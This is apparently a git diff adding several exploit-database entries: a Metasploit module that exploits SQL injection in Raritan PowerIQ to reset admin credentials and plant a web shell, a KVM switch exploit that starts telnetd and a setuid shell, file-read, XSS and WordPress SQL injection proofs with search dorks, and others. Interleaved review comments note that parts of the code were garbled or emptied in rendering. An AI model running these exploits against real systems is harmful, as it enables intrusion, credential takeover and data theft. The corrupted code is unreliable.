True: + send_request(evil, evil) + + threading.Thread(target=mod_status_thread).start() + threading.Thread(target=requests).start() + + -- cut + +Below are the information leak samples gathered by running the poc +against the +testing Apache instance. Leaks include i.e. HTTP headers, htaccess +content, +httpd.conf content etc. On a live systems with a higher traffic +samples should +be way more interesting. + + $ ./poc.py | grep "" |grep -v AAAA | grep -v "{}"| grep -v notables + 127.0.0.1 {A} [] + 127.0.0.1 {A.01 cu0 cs0 + 127.0.0.1 {A27.0.0.1} [] + 127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0 + 127.0.0.1 {A + Û [] + 127.0.0.1 {A HTTP/1.1} [] + 127.0.0.1 {Ab>
+ 127.0.0.1 {AAA} [127.0.1.1:19666]
+ 127.0.0.1 {A0.1.1:19666]
+ 127.0.0.1 {A§} [] + 127.0.0.1 {A cs0 + 127.0.0.1 {Adentity + 127.0.0.1 {A HTTP/1.1} [] + 127.0.0.1 {Ape: text/html; charset=ISO-8859-1 + 127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} [] + 127.0.0.1 {Aÿÿÿÿÿÿÿ} [] + 127.0.0.1 {Aanilla/htdocs/foo} [] + 127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} [] + 127.0.0.1 {A......................................... } [] + 127.0.0.1 {A-2014 16:23:30 CEST} [] + 127.0.0.1 {Acontent of htaccess + 127.0.0.1 {Aver: Apache/2.4.7 (Unix) + 127.0.0.1 {Aroxy:balancer://mycluster} [] +We hope you enjoyed it. + +Regards, +Marek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466 + + diff --git a/platforms/linux/remote/34026.py b/platforms/linux/remote/34026.py new file mode 100755 index 000000000..94904315a --- /dev/null +++ b/platforms/linux/remote/34026.py 
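Review bot: The quoted util.c listing in section 2 has lost characters in this rendering: `s[i] != ''` and `if (s[i] == '')` in the loops at 1866/1867 and 1880/1881 are not valid C, and `memcpy(&x[j], ">", 4)`, `memcpy(&x[j], "&", 5)` and `memcpy(&x[j], """, 6)` copy more bytes than their literals hold, which is consistent with `'\0'` and the HTML entity escapes having been decoded away, so the listing should not be read literally; the container directive around `SetHandler server-status` in section 1 and the format string at 833/834 appear to be affected the same way. Section 4 lists the overlap of the `s` and `d` allocations as a precondition for the overwrite but does not show it occurring, and section 3 says "may lead to", which is the right hedge: the PoC in section 5 demonstrates only the information-leak side. From the defender's side the text could state explicitly that the reader half of the race is the status handler, so restricting whatever location carries `SetHandler server-status` to trusted clients (or turning `ExtendedStatus` off) removes the trigger until the server is upgraded to a release containing the fix.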
@@ -0,0 +1,75 @@ +#!/usr/bin/python + +# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC +# Date: 09/07/2014 +# Exploit Author: EccE +# Vendor Homepage: http://www.openvas.org/ +# Software Link: http://wald.intevation.org/frs/?group_id=29 +# Version: OpenVAS Manager 4.0 +# Tested on: Debian GNU/Linux testing (jessie) +# CVE : CVE-2013-6765 + +""" + Small list of working commands + +get_agents +get_configs +get_alerts +get_filters +get_lsc_credentials +get_notes +get_nvts +get_targets +get_users +get_schedules + + +More commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though. +As designed in OMP protocol, commands must be sent this way : + +""" + +import socket, ssl + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + +# Require a certificate from the server. We used a self-signed certificate +# so here cacerts.pem must be the server certificate itself. +ssl_sock = ssl.wrap_socket(s, + ca_certs="/var/lib/openvas/CA/cacert.pem", + cert_reqs=ssl.CERT_REQUIRED) + +# OpenVAS Manager listen by default on localhost tcp/9390 +ssl_sock.connect(('localhost', 9390)) + + +print "#################################################################" +print "# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #" +print "#################################################################" +print "\n" + +print "--> Retrieving version...(exploiting the bug !)\n" +ssl_sock.write("") +data = ssl_sock.read() +print data +print "\n" + + +print "--> Retrieving slaves...\n" +ssl_sock.write("") +tasks = ssl_sock.read() +print tasks +print "\n" + +""" +print "--> Creating note...\n" +ssl_sock.write("") +note = ssl_sock.read() +print note + +print "--> Retrieving users list...\n" +ssl_sock.write("") +users_list = ssl_sock.read() +print users_list +""" +ssl_sock.close() diff --git a/platforms/linux/webapps/34130.rb b/platforms/linux/webapps/34130.rb new file mode 100755 index 000000000..507a05070 --- /dev/null 
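Review bot: Every `ssl_sock.write("")` in this file sends an empty string, so the OMP request bodies appear to have been lost when the text was rendered (the XML elements are missing, as is the example after "commands must be sent this way :"), and the script as committed exchanges nothing with the manager beyond the TLS handshake. Independently of that, a single `ssl_sock.read()` returns at most one record, so a longer reply would be truncated; the reads should loop until `read()` returns an empty string before printing. The comment above `ssl.wrap_socket` should also say that `cert_reqs=ssl.CERT_REQUIRED` validates the chain against `ca_certs` only and performs no hostname check, which is why pointing `ca_certs` at the server's own self-signed certificate works here.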
+++ b/platforms/linux/webapps/34130.rb 
@@ -0,0 +1,572 @@ +=begin +Raritan PowerIQ suffers from an unauthenticated SQL injection vulnerability +within an endpoint used during initial configuration of the licensing for +the product. This endpoint is still available after the appliance has been +fully configured. + +POST /license/records HTTP/1.1 + +Host: 192.168.1.11 + +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:26.0) +Gecko/20100101 Firefox/26.0 + +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +X-Requested-With: XMLHttpRequest + +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +Referer: https://192.168.1.11/license + +Content-Length: 15 + +Connection: keep-alive + +Pragma: no-cache + +Cache-Control: no-cache + + +sort=id&dir=ASC + + + +Both the 'sort' and 'dir' parameters are vulnerable. + +sqlmap identified the following injection points with a total of 1173 +HTTP(s) requests: +--- +Place: POST +Parameter: sort + Type: boolean-based blind + Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses + Payload: sort=id,(SELECT (CASE WHEN (6357=6357) THEN 1 ELSE 1/(SELECT +0) END))&dir=ASC + + Type: stacked queries + Title: PostgreSQL > 8.1 stacked queries + Payload: sort=id; SELECT PG_SLEEP(5)--&dir=ASC + + Type: AND/OR time-based blind + Title: PostgreSQL > 8.1 time-based blind - Parameter replace + Payload: sort=(SELECT 5480 FROM PG_SLEEP(5))&dir=ASC + +Place: POST +Parameter: dir + Type: boolean-based blind + Title: Generic boolean-based blind - GROUP BY and ORDER BY clauses + Payload: sort=id&dir=ASC,(SELECT (CASE WHEN (5274=5274) THEN 1 ELSE +1/(SELECT 0) END)) + + Type: stacked queries + Title: PostgreSQL > 8.1 stacked queries + Payload: sort=id&dir=ASC; SELECT PG_SLEEP(5)-- + + Type: AND/OR time-based blind + Title: PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses + Payload: sort=id&dir=ASC,(SELECT (CASE WHEN (1501=1501) THEN (SELECT +1501 FROM 
PG_SLEEP(5)) ELSE 1/(SELECT 0) END)) +--- + + +There may also be a remote command execution vulnerability available to +administrators (or you if you use the stacked injection to update the +hashes). + +When saving an NTP server, you can inject a newline (%0a) into the request +in order to save a malformed 'server' stanza in the ntp.conf. When syncing +with NTP, the application passes the first NTP server to the NTP utility +via bash. I was not able to make my malformed NTP server available as the +first in the list, thus was not able to achieve RCE. There may be a way to +do it though that I am unaware of. + +Attached is a Metasploit module that I began writing when attempting to +achieve RCE but was never able to. This module will + +A) Pull out the current password hash and salt for the 'admin' user and +cache them. +B) Update the admin creeds to be 'admin:Passw0rd!' +C) Set up the malformed NTP server +D) Attempt to sync with NTP. + +Because I was not able to achieve RCE via that vector, this module does not +actually pop a shell, so I am sorry about that. + +Maybe some PostgreSQL UDF fanciness will be the key. + +You may also find the module available here: +https://gist.github.com/brandonprry/01bcd9ec7b8a78ccfc42 + +Quick module run: + +bperry@w00den-pickle:~/tools/msf_dev$ ./msfconsole + _ _ +/ \ /\ __ _ __ /_/ __ +| |\ / | _____ \ \ ___ _____ | | / \ _ \ \ +| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| +|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ + |/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\ + + + =[ metasploit v4.9.0-dev [core:4.9 api:1.0] ] ++ -- --=[ 1292 exploits - 702 auxiliary - 202 post ] ++ -- --=[ 332 payloads - 33 encoders - 8 nops ] + +msf > use exploit/linux/http/raritan_poweriq_sqli +msf exploit(raritan_poweriq_sqli) > set RHOST 192.168.1.25 +RHOST => 192.168.1.25 +msf exploit(raritan_poweriq_sqli) > check + +[*] Attempting to get banner... This could take several minutes to +fingerprint depending on network speed. 
+[*] Looks like the length of the banner is: 107 +[+] Looks like you are vulnerable. +[+] 192.168.1.25:443 - The target is vulnerable. +msf exploit(raritan_poweriq_sqli) > exploit + +[*] Started reverse handler on 192.168.1.31:4444 +[*] Checking if vulnerable before attempting exploit. +[*] Attempting to get banner... This could take several minutes to +fingerprint depending on network speed. +[*] Looks like the length of the banner is: 107 +[+] Looks like you are vulnerable. +[*] We are vulnerable. Exploiting. +[*] Caching current admin user's password hash and salt. +[*] I can set it back later and they will be none the wiser +[*] Grabbing current hash +[*] Old hash: 84c420e40496930e27301b10930e5966638e0b21 +[*] Grabbing current salt +[*] Old salt: 8f3cceddf302b3e2465d6e856e8818c6217d4d04 +[*] Resetting admin user credentials to admin:Passw0rd! +[*] Authenticating with admin:Passw0rd! +[*] Setting some stuff up +[*] Sending stager +[*] Triggering stager +[*] Exploit completed, but no session was created. +msf exploit(raritan_poweriq_sqli) > + + +-- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website +=end + +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Raritan PowerIQ Unauthenticated SQL Injection", + 'Description' => %q{ + This module will exploit an unauthenticated SQL injection in order to gain + a shell on the remote victim. This was tested against PowerIQ v4.1.0. + + The 'check' command will attempt to pull the banner of the DBMS (PGSQL) in + order to verify exploitability via boolean injections. + + In order to gain remote command execution, multiple vulnerabilities are used. + + I use a SQL injection to gain administrative access. 
+ + I use a newline injection to save an NTP server I shouldn't be able to save. + + By saving this unsanitized NTP server, I can execute commands as 'nginx' with + a request to the server's web application. + + You can find a trial ISO at the following link. CentOS-based with PGSQL. + This is what this module was tested against. + + http://cdn.raritan.com/download/power-iq/v4.1.0/power-iq-v4.1.0.73.iso + + Trial license: + http://d3b2us605ptvk2.cloudfront.net/download/power-iq/RAR_PWIQ5FL_W7rYAAT_13JAN10_1206.lic + + If for some reason these links do not work, I "registered" for the trial here: + https://www1.raritan.com/poweriqdownload.html + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + ], + 'References' => + [ + ], + 'DefaultOptions' => + { + 'SSL' => true, + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'BadChars' => "\x20", + 'Compat' => + { + 'RequiredCmd' => 'generic perl python', + } + }, + 'Targets' => + [ + ['Raritan PowerIQ v4.1.0', {}] + ], + 'Privileged' => false, + 'DisclosureDate' => "", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(443), + OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) + ], self.class) + end + + #In order to check for exploitability, I will enumerate the banner + #of the DBMS until I have it match a regular expression of /postgresql/i + # + #This isn't optimal (takes a few minutes), but it is reliable. I use + #a boolean injection to enumerate the banner a byte at a time. 
+ def check + + #First we make a request that we know should return a 200 + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'data' => 'sort=id&dir=ASC' + }) + + if !res or res.code != 200 + return Exploit::CheckCode::Safe + end + + #Now we make a request that we know should return a 500 + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'data' => "sort=id'&dir=ASC" + }) + + if !res or res.code != 500 + print_error("Probably not vulnerable.") + return Exploit::CheckCode::Safe + end + + #If we have made it this far, we believe we are exploitable, + #but now we must prove it. Get the length of the banner before + #attempting to enumerate the banner. I assume the length + #is not greater than 999 characters. + print_status("Attempting to get banner... 
This could take several minutes to fingerprint depending on network speed.") + + length = '' + (1..3).each do |l| + (47..57).each do |i| + str = "sort=id,(SELECT (CASE WHEN (ASCII(SUBSTRING((COALESCE(CAST(LENGTH(VERSION()) AS CHARACTER(10000)),(CHR(32))))::text FROM #{l} FOR 1))>#{i}) THEN 1 ELSE 1/(SELECT 0) END))&dir=ASC" + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'data' => str + }) + + if res and res.code == 500 + length << i.chr + break + end + end + end + + if length == '' + return Exploit::CheckCode::Safe + end + + print_status("Looks like the length of the banner is: " + length) + + #We have the length, now let's get the banner until it matches + #the regular expression /postgresql/i + banner = '' + (1..length.to_i).each do |c| + (32..126).each do |b| + str = "sort=id,(SELECT (CASE WHEN (ASCII(SUBSTRING((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32))))::text FROM #{c} FOR 1))>#{b}) THEN 1 ELSE 1/(SELECT 0) END))&dir=ASC" + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest', + }, + 'data' => str + }) + + if res and res.code == 500 + banner << b.chr + + if c%10 == 0 + vprint_status("#{((c.to_f/length.to_f)*100).to_s}% done: " + banner) + end + + if banner =~ /postgresql/i + print_good("Looks like you are vulnerable.") + vprint_good("Current banner: " + banner) + return Exploit::CheckCode::Vulnerable + end + + break + end + end + end + + #If we reach here, we never matched our regex, which means we must + #not be vulnerable. + return Exploit::CheckCode::Safe + end + + def exploit + + print_status("Checking if vulnerable before attempting exploit.") + + if check == Exploit::CheckCode::Vulnerable + print_status("We are vulnerable. 
Exploiting.") + print_status("Caching current admin user's password hash and salt.") + print_status("I can set it back later and they will be none the wiser") + + print_status("Grabbing current hash") + old_crypted_password = get_admin_column_value("crypted_password") + print_status("Old hash: " + old_crypted_password) + + print_status("Grabbing current salt") + old_salt = get_admin_column_value("salt") + print_status("Old salt: " + old_salt) + + print_status("Resetting admin user credentials to admin:Passw0rd!") + + headers = { + 'X-Requested-With' => 'XMLHttpRequest' + } + + salt_inj = ';UPDATE users set salt = (CHR(56)||CHR(102)||CHR(51)||CHR(99)||CHR(99)||CHR(101)||CHR(100)||CHR(100)||CHR(102)||CHR(51)||CHR(48)||CHR(50)||CHR(98)||CHR(51)||CHR(101)||CHR(50)||CHR(52)||CHR(54)||CHR(53)||CHR(100)||CHR(54)||CHR(101)||CHR(56)||CHR(53)||CHR(54)||CHR(101)||CHR(56)||CHR(56)||CHR(49)||CHR(56)||CHR(99)||CHR(54)||CHR(50)||CHR(49)||CHR(55)||CHR(100)||CHR(52)||CHR(100)||CHR(48)||CHR(52)) WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))--' + hash_inj = ';UPDATE users set crypted_password=(CHR(56)||CHR(52)||CHR(99)||CHR(52)||CHR(50)||CHR(48)||CHR(101)||CHR(52)||CHR(48)||CHR(52)||CHR(57)||CHR(54)||CHR(57)||CHR(51)||CHR(48)||CHR(101)||CHR(50)||CHR(55)||CHR(51)||CHR(48)||CHR(49)||CHR(98)||CHR(49)||CHR(48)||CHR(57)||CHR(51)||CHR(48)||CHR(101)||CHR(53)||CHR(57)||CHR(54)||CHR(54)||CHR(54)||CHR(51)||CHR(56)||CHR(101)||CHR(48)||CHR(98)||CHR(50)||CHR(49)) WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))--' + + post = { + 'sort' => 'id' + salt_inj, + 'dir' => 'ASC' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => headers, + 'vars_post' => post + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way") + end + + post['sort'] = 'id' + hash_inj + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'license', 'records'), + 
'method' => 'POST', + 'headers' => headers, + 'vars_post' => post + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way") + end + + print_status("Authenticating with admin:Passw0rd!") + post = { + 'login' => 'admin', + 'password' => 'Passw0rd!' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'login', 'login'), + 'method' => 'POST', + 'vars_post' => post + }) + + if !res or res.code != 302 + fail_with("Authentication failed.") + end + + cookie = res.get_cookies + + print_status("Setting some stuff up") + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers.json'), + 'headers' => headers, + 'cookie' => cookie + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way.") + end + + servers = JSON.parse(res.body) + + post = { + '_method' => '_delete', + 'hosts' => servers["servers"].to_json + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers', 'destroy_batch'), + 'method' => 'DELETE', + 'vars_post' => post, + 'headers' => headers, + 'cookie' => cookie + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way.") + end + + print_status("Sending stager") + + stage = '`echo${IFS}Ye2xhc3MgRmRzYUNvbnRyb2xsZXIgPCBBY3Rpb25Db250cm9sbGVyOjpCYXNlCiAgZGVmIGluZGV4' + stage << 'CiAgICByZXQgPSBgI3twYXJhbXNbOmNtZF19YAogICAgcmVkaXJlY3RfdG8gcmV0CiAgZW5kCmVu' + stage << 'ZCAKIAoK|base64${IFS}--decode>/opt/raritan/polaris/rails/main/app/controllers/rewq_controller.rb`' + + post = { + 'host[server]' => "www.abc.com\x0aserver " + stage, + 'host[ip_type]' => '0' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers'), + 'method' => 'POST', + 'vars_post' => post, + 'headers' => headers, + 'cookie' => cookie + }) + + if !res or res.code != 200 or res.body =~ /false/ + fail_with("Server did not respond in an expected way.") + end + + post = { + 
'_method' => '_delete', + 'hosts' => '[{"server":"www.abc.com", "ip_type":0}]' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_servers', 'destroy_batch'), + 'method' => 'DELETE', + 'vars_post' => post, + 'headers' => headers, + 'cookie' => cookie + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way.") + end + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'application_settings', 'edit'), + 'cookie' => cookie + }) + + if !res or res.code != 200 + fail_with("Server did not respond in an expected way.") + end + + res.body =~ /boxLabel: "Enable NTP",\n checked: (true|false),\n listeners/m + + checked = $1 + + if checked == "true" + post = { + '_method' => 'put', + 'rails_options[time_zone]' => 'UTC', + 'date_time' => '', + 'rails_options[ntp_enabled]' => 'off' + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_setting'), + 'vars_post' => post, + 'method' => 'POST', + 'cookie' => cookie + }) + + if !res or res.code != 302 + fail_with("Server did not respond in an expected way") + end + end + + post = { + '_method' => 'put', + 'rails_options[time_zone]' => 'UTC', + 'date_time' => '', + 'rails_options[ntp_enabled]' => 'on' + } + + print_status("Triggering stager") + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'admin', 'time_setting'), + 'method' => 'POST', + 'vars_post' => post, + 'cookie' => cookie, + }) + + end + end + + def get_admin_column_value(column) + ret = '' + + (1..40).each do |i| + [*('0'..'9'),*('a'..'f')].each do |c| + inj = "(SELECT (CASE WHEN (ASCII(SUBSTRING((SELECT COALESCE(CAST(#{column} AS CHARACTER(10000)),(CHR(32))) FROM users WHERE login = (CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110)) OFFSET 0 LIMIT 1)::text FROM #{i} FOR 1))>#{c.ord}) THEN 1 ELSE 1/(SELECT 0) END))" + + post = { + 'sort' => 'id,' + inj, + 'dir' => 'ASC' + } + + res = send_request_cgi({ + 'uri' => 
normalize_uri(target_uri.path, 'license', 'records'), + 'method' => 'POST', + 'headers' => { + 'X-Requested-With' => 'XMLHttpRequest' + }, + 'vars_post' => post + }) + + if !res + fail_with("Server did not respond in an expected way") + end + + if res.code == 500 + vprint_status("Got character '"+c+"' for index " + i.to_s) + ret << c + break + end + end + end + + return ret + end +end diff --git a/platforms/php/remote/34132.txt b/platforms/php/remote/34132.txt new file mode 100755 index 000000000..e2cc40cdd --- /dev/null +++ b/platforms/php/remote/34132.txt 
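Review bot: In `exploit`, `old_crypted_password` and `old_salt` are fetched and printed but never used again, so the status lines `"Caching current admin user's password hash and salt."` and `"I can set it back later and they will be none the wiser"` describe behaviour the module does not have: the reset to `admin:Passw0rd!`, the deletion of every configured NTP server via `destroy_batch`, the added `host[server]` entry and the NTP enable toggle all persist on the target after the run. Those side effects belong in the module's 'Description' so an operator knows the appliance is left modified, and the misleading message should be removed or reworded. The metadata is also incomplete: 'Author' and 'References' are empty arrays and 'DisclosureDate' is `""`, although the =begin block names the author, the gist and the advisory details. The `CHR()` sequences in `salt_inj` and `hash_inj` would be easier to audit as named constants with a comment giving the literal string each one encodes.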
@@ -0,0 +1,128 @@ + *Product description* + The IBM 1754 GCM family provides KVM over IP and serial console management +technology in a single appliance. Versions v1.20.0.22575 and prior are +vulnerables. + Note that this vulnerability is also present in some DELL and probably +other vendors of this rebranded KVM. I contacted Dell but no response has +been received. + + *1. Remote code execution * + CVEID: CVE-2014-2085 + Description: Improperly sanitized input may allow a remote authenticated +attacker to perform remote code execution on the GCM KVM switch. + PoC of this vulnerability: + +#!/usr/bin/python""" +Exploit for Avocent KVM switch v1.20.0.22575. +Remote code execution with privilege elevation. +SessionId (avctSessionId) is neccesary for this to work, so you need a +valid user. Default user is "Admin" with blank password. +After running exploit, connect using telnet to device with user target +(pass: target) then do "/tmp/su -" to gain root (password "root") +alex.a.bravo@gmail.com +""" + +from StringIO import StringIO +import pycurl +import os + +sessid = "1111111111" +target = "192.168.0.10" + +durl = "https://" + target + "/systest.php?lpres=;%20/usr/ +sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% +206755%20/tmp/su%20;" + +storage = StringIO() +c = pycurl.Curl() +c.setopt(c.URL, durl) +c.setopt(c.SSL_VERIFYPEER,0) +c.setopt(c.SSL_VERIFYHOST,0) +c.setopt(c.WRITEFUNCTION,storage.write) +c.setopt(c.COOKIE,'avctSessionId=' + sessid) + +try: + print "[*] Sending GET to " + target + " with session id " + sessid ++ "..." + c.perform() + c.close() +except: + print "" +finally: + print "[*] Done" +print "[*] Trying telnet..." +print "[*] Login as target/target, then do /tmp/su - and enter password +\"root\"" +os.system("telnet " + target) + +*2. Arbitrary file read * + CVEID: CVE-2014-3081 + Description: This device allows any authenticated user to read arbitrary +files. Files can be anywhere on the target. 
+ + PoC of this vulnerability: + +#!/usr/bin/python +""" +This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to +read arbitrary files on device. +SessionId (avctSessionId) is neccesary for this to work, so you need a +valid user. +alex.a.bravo@gmail.com +""" + +from StringIO import StringIO +import pycurl + +sessid = "1111111111" +target = "192.168.0.10" +file = "/etc/IBM_user.dat" + +durl = "https://" + target + "/prodtest.php?engage=video_ +bits&display=results&filename=" + file + +storage = StringIO() +c = pycurl.Curl() +c.setopt(c.URL, durl) +c.setopt(c.SSL_VERIFYPEER,0) +c.setopt(c.SSL_VERIFYHOST,0) +c.setopt(c.WRITEFUNCTION,storage.write) +c.setopt(c.COOKIE,'avctSessionId=' + sessid) + +try: + c.perform() + c.close() +except: + print "" + +content = storage.getvalue() +print content.replace("","").replace("","") + +*3. Cross site scripting non-persistent* + CVEID: CVE-2014-3080 + Description: System is vulnerable to cross-site scripting, caused by +improper validation of user-supplied input. A remote attacker could exploit +this vulnerability using a specially-crafted URL to execute script in a +victim's Web browser within the security context of the hosting Web site, +once the URL is clicked. An attacker could use this vulnerability to steal +the victim's cookie-based authentication credentials. + + Examples: +http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E +https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E + +*Vendor Response:* +IBM release 1.20.20.23447 firmware + +*Timeline:* +2014-05-20 - Vendor (PSIRT) notified +2014-05-21 - Vendor assigns internal ID +2014-07-16 - Patch Disclosed +2014-07-17 - Vulnerability disclosed + +*External Information:* +Info about the vulnerability (spanish): +http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html +IBM Security Bulletin: +http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983 + 
diff --git a/platforms/php/webapps/34105.txt b/platforms/php/webapps/34105.txt new file mode 100755 index 000000000..15ed4df58 --- /dev/null +++ b/platforms/php/webapps/34105.txt @@ -0,0 +1,52 @@ +###################### +# Exploit Title : Wordpress Gallery Objects 0.4 SQL Injection + +# Exploit Author : Claudio Viviani + +# Vendor Homepage : http://galleryobjects.com/ + +# Software Link : http://downloads.wordpress.org/plugin/gallery-objects.0.4.zip + +# Dork Google: inurl:/admin-ajax.php?action=go_view_object + +# Date : 2014-07-18 + +# Tested on : Windows 7 / Mozilla Firefox + Windows 7 / sqlmap (0.8-1) + Linux / Mozilla Firefox + Linux / sqlmap 1.0-dev-5b2ded0 + + + +###################### + + +Poc via Browser: + +http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1[ and 1=2]&type=html + + +sqlmap: + +sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=go_view_object&viewid=1&type=html" -p viewid + +--- +Place: GET +Parameter: viewid + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: action=go_view_object&viewid=475 AND 7403=7403&type=html +--- + + +##################### + +Discovered By : Claudio Viviani + http://www.homelab.it + info@homelab.it + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + +##################### \ No newline at end of file diff --git a/platforms/php/webapps/34124.txt b/platforms/php/webapps/34124.txt new file mode 100755 index 000000000..f3fbb5c7e --- /dev/null +++ b/platforms/php/webapps/34124.txt 
@@ -0,0 +1,25 @@ +# Exploit Title: Wordpress wpbackupplus Database and files Backup download (0-day) +# Google Dork: Index of:"/wp-backup-plus" +# Date: 19/07/2014 +# Exploit Author: pSyCh0_3D (Arfaoui Moslem) https://www.facebook.com/lulz.sec +# Vendor Homepage: http://wpbackupplus.com/ +# Version: +# Tested on: win7 32 Bit & Linux Kali + +[+] Description + +wpbackupplus make the backup .zip files and not protected + +[+] Exploit: + +For download all the website files + +http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/ + +For download the Database backup + +http://[SITE]/[PATH]/wp-content/uploads/wp-backup-plus/temp + +[+] POC : + +http://[SERVER]/wp-content/uploads/wp-backup-plus/temp/ diff --git a/platforms/win32/dos/34010.html b/platforms/win32/dos/34010.html new file mode 100755 index 000000000..d09c5c588 --- /dev/null +++ b/platforms/win32/dos/34010.html @@ -0,0 +1,113 @@ + + + + + + +
+ +
+ + + + + + + \ No newline at end of file diff --git a/platforms/windows/dos/34129.txt b/platforms/windows/dos/34129.txt new file mode 100755 index 000000000..9e6bfa3dc --- /dev/null +++ b/platforms/windows/dos/34129.txt 
@@ -0,0 +1,55 @@ +# Exploit Title: World Of Warcraft 3.3.5a Stack Overflow (macros-cache.txt) +# Date: 21 Jul 2014 +# Exploit Author: Alireza Chegini (@nimaarek) +# Vendor Homepage: http://us.battle.net/wow/ +# Version: 3.3.5a +# Tested on: Win7 + +Output: + +--WoWError [CrashDUmp] : +World of WarCraft (build 12340) + +Exe: D:\Wow\Wow.exe +Time: Jul 21, 2014 6:10:08.243 PM +User: nimaarek +Computer: NIMAAREK-L +------------------------------------------------------------------------------ + +This application has encountered a critical error: + +ERROR #132 (0x85100084) Fatal Exception +Program: D:\Wow\Wow.exe +Exception: 0xC00000FD (STACK_OVERFLOW) at 0023:0040BB77 + +--Windbg result: +0:020> g +ModLoad: 6c670000 6c6a0000 C:\Windows\SysWOW64\wdmaud.drv +ModLoad: 6d3a0000 6d3a4000 C:\Windows\SysWOW64\ksuser.dll +ModLoad: 6c660000 6c667000 C:\Windows\SysWOW64\AVRT.dll +ModLoad: 6c610000 6c618000 C:\Windows\SysWOW64\msacm32.drv +ModLoad: 6c600000 6c607000 C:\Windows\SysWOW64\midimap.dll +ModLoad: 71e50000 71e66000 C:\Windows\SysWOW64\CRYPTSP.dll +ModLoad: 71e10000 71e4b000 C:\Windows\SysWOW64\rsaenh.dll +(3a8.470): Stack overflow - code c00000fd (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. 
